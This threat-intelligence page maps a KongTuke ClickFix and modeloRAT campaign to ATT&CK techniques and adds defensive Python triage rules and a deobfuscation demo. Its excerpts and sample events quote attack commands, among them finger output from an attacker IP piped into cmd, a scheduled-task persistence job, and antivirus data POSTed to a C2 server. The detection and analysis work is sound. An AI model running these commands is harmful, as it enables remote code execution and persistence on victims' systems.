TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Trend Micro Research

Through the Lens of MDR: Analysis of KongTuke’s ClickFix Abuse of Compromised WordPress Sites

Lisa Wu · 2026-03-10

ATT&CK techniques detected

17 predictions, each listed as technique, classifier confidence, and the excerpt of the article it was drawn from:

T1059.001 PowerShell (98%)
“…connected to an external IP (45.61.138[.]224) and piped the response directly into the command interpreter, enabling remote command execution (RCE). Although finger.exe is a legitimate Windows networking tool, it was abused in this instance to establish unauthorized rem…”

T1059.006 Python (97%)
“…ta\winpython.zip" to retrieve a ZIP archive from an attacker-controlled Dropbox link and saves it to %APPDATA%. - Extract the archive. It uses the command Expand-Archive -Path "$env:APPDATA\winpython.zip" -DestinationPath "$env:APPDATA" to unpack what a…”

T1053.005 Scheduled Task (95%)
“For persistence, the following registry entries are created: - ObjectRegistryValue: MonitoringService - ObjectRegistryKeyHandle: HKCU\Software\Microsoft\Windows\CurrentVersion\Run - ObjectRegistryData: C:\Users\<username>\AppData\Roaming\WPy64-31401\…”

T1059.001 PowerShell (93%)
“…s leads to a fake CAPTCHA page instructing the user to run a PowerShell command. While the PowerShell observed in our case differed from the April 2025 example, it exactly matched the command documented in a separate January 2026 finding, which described the same infection chai…”

T1059.001 PowerShell (90%)
“…remediation instructions. Once they follow the instructions, they’ll inadvertently execute a malicious PowerShell command. In our MDR investigation, however, we found no evidence of the CrashFix browser-extension method. Instead, TrendAI Vision One™ forensics indicates that t…”

T1027 Obfuscated Files or Information (75%)
“…<username>\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\udp.pyw"" /sc minute /mo 5 /f Our analysis of the udp.pyw file shows that this threat employs multilayered obfuscation to prevent string analysis or manual investigation of the script. After dec…”

T1059.001 PowerShell (68%)
“…modes.py module initiates reconnaissance activity that profiles the compromised host before advancing to subsequent stages of intrusion. Telemetry analysis shows the malware invoking PowerShell in hidden, non-interactive mode, executing a rapid sequence of enumeration commands…”

T1059.001 PowerShell (67%)
“…extension to initiate infection. - The attack relies heavily on legitimate system tools and trusted services to avoid detection. By abusing components such as PowerShell, finger.exe, Dropbox-hosted files, and portable Python environments, the malware can execute commands remot…”

T1204.004 Malicious Copy and Paste (63%)
Same excerpt as the T1059.001 (93%) entry above.

T1105 Ingress Tool Transfer (61%)
“…using: Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct - This collects installed antivirus product names. - It sends the collected data via HTTP POST to: hxxp://45.61.138[.]224/n - The message body includes: - A campaign identifier…”

T1059.001 PowerShell (59%)
“Through the Lens of MDR: Analysis of KongTuke’s ClickFix Abuse of Compromised WordPress Sites. Our analysis of an active KongTuke campaign deploying modeloRAT — malware capa…”

T1059.001 PowerShell (57%)
“…: hxxps://foodgefy[.]com/6o0jk.js (162.33.178[.]171 — AS399629 [BL Networks]). The injected script aligns with the documented KongTuke tradecraft, which does the following: - Set a cookie. - Make a request to a Cloudflare endpoint to get trace information (su…”

T1059.001 PowerShell (55%)
“…ress highlighted the emergence of the new CrashFix technique, our MDR findings confirm that the group still uses compromised WordPress websites and fake CAPTCHA lures as an infection vector. Both delivery paths — CrashFix browser-extension abuse and ClickFix/fake CAPTCHA chain…”

T1204.002 Malicious File (46%)
Same excerpt as the T1059.001 (67%) entry above.

T1059 Command and Scripting Interpreter (38%)
Same excerpt as the T1059.001 (98%) entry above.

T1204.002 Malicious File (36%)
“…4c78f2621', 'b64decode', 'var_1363a4c4e644abdf', 'bytes', 'enumerate', 'len', 'var_40eab56476d5b9f6', 'decode', 'var_ae751dbc35895e07', 'var_794ede7b4b034ebe', 'xor_encrypt_decrypt', 'get_codepage', 'run_command', 'get_domain', 'con…”

T1204.004 Malicious Copy and Paste (32%)
Same excerpt as the T1059.001 (67%) entry above.
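The excerpts above describe five host-side behaviours that an MDR analyst can turn directly into triage rules: finger.exe output piped into a command interpreter, Expand-Archive unpacking winpython.zip under %APPDATA%, a Run-key value pointing into AppData\Roaming\WPy64-*, a schtasks job firing every five minutes to run a .pyw from the SoftwareProtectionPlatform directory, and hidden non-interactive PowerShell querying root/SecurityCenter2 AntiVirusProduct. The following is an added example written for this page, not Trend Micro detection content or code from the article. The telemetry records are constructed to mirror the excerpts; the exact command-line shapes (the finger target, the task name, the pythonw.exe tail that completes the truncated WPy64-31401 path) are assumptions. The Run-key rule is tagged T1547.001 (Registry Run Keys), the ATT&CK technique for that evidence, even though the page's classifier attached the same excerpt to its T1053.005 entry.

```python
"""Triage rules for the host behaviours quoted in the excerpts above.

Added example for this page, not Trend Micro code. SAMPLE_EVENTS is
constructed to mirror the excerpts; exact command-line shapes are assumed.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    id: int
    kind: str             # "process" (creation) or "registry" (value set)
    image: str = ""       # image name of the created process
    cmdline: str = ""     # full command line of the created process
    reg_key: str = ""     # key path for registry events
    reg_value: str = ""   # value name for registry events
    reg_data: str = ""    # value data for registry events


def _proc(e, *patterns):
    """True for a process event whose command line matches every pattern."""
    return e.kind == "process" and all(re.search(p, e.cmdline, re.I) for p in patterns)


# (rule name, ATT&CK technique, predicate). Matching is behavioural, so a
# different C2 address or task name still trips the same rule.
RULES = [
    ("finger.exe response piped into cmd/powershell", "T1059",
     lambda e: _proc(e, r"\bfinger(\.exe)?\s+\S+@\S+[^|]*\|\s*(cmd|powershell)")),
    ("Expand-Archive of winpython.zip in %APPDATA%", "T1059.006",
     lambda e: _proc(e, r"\bexpand-archive\b", r"\$env:appdata\\winpython\.zip")),
    ("Run key value pointing into AppData\\Roaming\\WPy64-*", "T1547.001",
     lambda e: e.kind == "registry"
     and e.reg_key.lower().endswith(r"\currentversion\run")
     and re.search(r"\\appdata\\roaming\\wpy64-\d+\\", e.reg_data, re.I) is not None),
    ("schtasks 5-minute task running a .pyw from SoftwareProtectionPlatform", "T1053.005",
     lambda e: _proc(e, r"\bschtasks\b.*/create\b",
                     r"softwareprotectionplatform\\[^\s\"]+\.pyw",
                     r"/sc\s+minute\b", r"/mo\s+5\b")),
    ("hidden non-interactive PowerShell enumerating AV via SecurityCenter2", "T1059.001",
     lambda e: _proc(e, r"-windowstyle\s+hidden", r"-noninteractive",
                     r"root[/\\]securitycenter2\b", r"\bantivirusproduct\b")),
]

SAMPLE_EVENTS = [  # constructed to mirror the excerpts; not real telemetry
    Event(1, "process", "cmd.exe", "cmd /c finger user@45.61.138.224 | cmd"),
    Event(2, "process", "powershell.exe",
          r'powershell -c Expand-Archive -Path "$env:APPDATA\winpython.zip" -DestinationPath "$env:APPDATA"'),
    Event(3, "registry",
          reg_key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
          reg_value="MonitoringService",
          reg_data=r"C:\Users\alice\AppData\Roaming\WPy64-31401\python\pythonw.exe"),  # tail assumed
    Event(4, "process", "schtasks.exe",
          r'schtasks /create /tn Updater /tr "pythonw.exe C:\Users\alice\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\udp.pyw"" /sc minute /mo 5 /f'),
    Event(5, "process", "powershell.exe",
          'powershell -WindowStyle Hidden -NonInteractive -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct"'),
    # Benign look-alikes that must stay quiet:
    Event(6, "process", "powershell.exe",
          'powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct"'),
    Event(7, "registry",
          reg_key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
          reg_value="OneDrive",
          reg_data=r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),
    Event(8, "process", "finger.exe", "finger alice@intranet.example"),
]


def triage(events):
    """Return (event id, technique, rule name) for every rule each event trips."""
    return [(e.id, tech, name) for e in events for name, tech, pred in RULES if pred(e)]


def techniques_seen(hits):
    """Distinct ATT&CK techniques across the hits; the full chain covers five."""
    return {tech for _, tech, _ in hits}


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Run stand-alone it prints one hit per malicious event and nothing for the three benign look-alikes. In production the same predicates sit on the process-creation and registry-value-set event sources rather than an in-memory list; the interactive SecurityCenter2 query (event 6) is deliberately not flagged because administrators run it by hand.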

Summary

Our analysis of an active KongTuke campaign deploying modeloRAT — malware capable of reconnaissance, command execution, and persistent access — through compromised WordPress sites and fake CAPTCHA lures shows that the group still operates this delivery chain in parallel with the newer CrashFix technique.
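The T1027 entry in the technique list above reports multilayered obfuscation in udp.pyw, and the T1204.002 (36%) excerpt lists names from the deobfuscated script: b64decode, xor_encrypt_decrypt, hex-suffixed var_ identifiers, get_codepage, run_command, get_domain. The following is an added example written for this page, not the KongTuke script or Trend Micro's analysis tooling. It builds a constructed three-layer XOR-then-base64 wrapper around a harmless stub and then peels it back by pulling the base64 literal and the bytes literal out of each stage. The layer order, the keys, the stub payload and the assumption that every stage carries its key as a bytes literal are all illustrative; the page does not say how udp.pyw combines these primitives.

```python
"""Peel a layered XOR+base64 script wrapper.

Added example for this page; the wrapper format, keys and stub payload are
constructed here and are not taken from udp.pyw.
"""
import base64
import re

# Constructed innermost stage: a harmless stand-in for the real RAT body.
FINAL_PAYLOAD = (
    "import os\n"
    "def get_domain():\n"
    "    return os.environ.get('USERDOMAIN', '')\n"
    "print(get_domain())\n"
)


def xor_encrypt_decrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so one routine both wraps and unwraps."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def wrap(stage: str, key: bytes, tag: str) -> str:
    """One obfuscation layer (assumed shape): XOR the stage, base64 it, and emit
    a loader with hex-style variable names that exec()s the decoded result.
    The loader relies on xor_encrypt_decrypt being defined by the outer stage."""
    blob = base64.b64encode(xor_encrypt_decrypt(stage.encode(), key)).decode()
    return (
        "from base64 import b64decode\n"
        f"var_{tag}a = '{blob}'\n"
        f"var_{tag}b = {key!r}\n"
        f"exec(xor_encrypt_decrypt(b64decode(var_{tag}a), var_{tag}b).decode())\n"
    )


def build_sample(layers: int = 3) -> str:
    """Nest FINAL_PAYLOAD inside `layers` wrappers, each with its own key."""
    stage = FINAL_PAYLOAD
    for i in range(layers):
        stage = wrap(stage, bytes([0x41 + i, 0x5A - i]), f"{i:02x}")
    return stage


# Single-quoted literals only, which is all the constructed loader emits.
STRING_LIT = re.compile(r"(b?)'([^'\n]*)'")
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_python(blob: bytes) -> bool:
    """Cheap plausibility check: decodes as text and contains a Python keyword."""
    try:
        text = blob.decode("utf-8")
    except UnicodeDecodeError:
        return False
    if not all(c.isprintable() or c in "\r\n\t" for c in text):
        return False
    return any(re.search(rf"\b{kw}\b", text) for kw in ("import", "from", "def", "exec"))


def peel_once(stage: str):
    """Decode one layer: try every base64-looking literal against every bytes
    literal as an XOR key; return the inner stage text, or None if nothing fits."""
    lits = STRING_LIT.findall(stage)
    blobs = [s for prefix, s in lits if not prefix and len(s) >= 16 and B64_ALPHABET.match(s)]
    keys = [s.encode() for prefix, s in lits if prefix and s]
    for blob in blobs:
        raw = base64.b64decode(blob)
        for key in keys:
            candidate = xor_encrypt_decrypt(raw, key)
            if looks_like_python(candidate):
                return candidate.decode("utf-8")
    return None


def unwrap(stage: str, max_layers: int = 16):
    """Peel until no layer decodes; returns (innermost stage, layers peeled)."""
    peeled = 0
    while peeled < max_layers:
        inner = peel_once(stage)
        if inner is None:
            break
        stage, peeled = inner, peeled + 1
    return stage, peeled


if __name__ == "__main__":
    sample = build_sample()
    final, n = unwrap(sample)
    print(f"peeled {n} layers")
    print(final)
```

The point of recovering the key from the stage itself rather than brute-forcing it is that a real loader has to carry everything needed to run, so static peeling never requires executing the sample; the plausibility check is what stops the loop at the innermost stage, where the string literals are just ordinary program data.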